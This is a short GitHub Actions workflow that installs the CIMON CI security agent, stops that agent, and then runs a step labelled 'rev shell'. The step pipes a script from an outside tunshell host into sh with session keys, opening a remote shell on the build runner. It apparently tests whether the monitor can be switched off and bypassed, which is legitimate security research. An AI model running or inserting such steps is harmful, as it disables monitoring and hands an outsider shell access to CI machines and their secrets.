name: CIMON

on:
  workflow_dispatch:

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
    - uses: cycodelabs/cimon-action@v0

    - name: Stop CIMON
      shell: bash
      run: | 
        /tmp/cimon/cimon agent stop

    - name: rev shell
      shell: bash
      run: |
        curl -sSf https://lets.tunshell.com/init.sh | sh -s -- T wNC2LHG4Fwl9qmTNTbywmI tSlxaQDhwsFfjaz54WqFIP eu.relay.tunshell.com
